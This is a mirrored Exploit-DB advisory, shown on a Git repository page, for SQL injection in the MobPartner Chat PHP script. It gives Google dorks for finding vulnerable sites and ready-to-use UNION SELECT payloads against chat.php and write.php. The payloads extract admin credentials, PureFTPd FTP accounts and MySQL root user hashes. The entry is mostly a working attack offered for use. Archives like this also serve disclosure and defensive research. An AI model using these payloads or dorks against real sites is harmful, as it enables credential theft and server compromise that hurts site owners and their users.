bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11321.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

48 lines
No EOL
2.1 KiB
Text
Raw Blame History

MobPartner Chat Multiple Sql Injection Vulnerability
============================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : MobPartner
.:. Download Script: http://www.mobpartner.com/services/chat/?wsid=32174
.:. Bug Type : Sql Injection [Mysql]
.:. Dork : [1]"Powered by MobPartner" inurl:"chat.php"
[2]"Powered by MobPartner" inurl:"write.php"
####################################################################
===[ Exploit ]===
www.site.com/chat.php?id=[SQL INJECTION]
www.site.com/write.php?id=[SQL INJECTION]
********************************************************************
T0 Get Username & Password Admin Site
[Sql Injection ; {Username & password Admin}]
www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
********************************************************************
T0 Get Username & Password FTP Control Panel
[Sql Injection ; {Username & Password FTP Control Panel}]
www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
********************************************************************
T0 Get Username & Password Root Server
[Sql Injection ; {Username & Password Root Server}]
www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
####################################################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
Reference in a new issue View git blame Copy permalink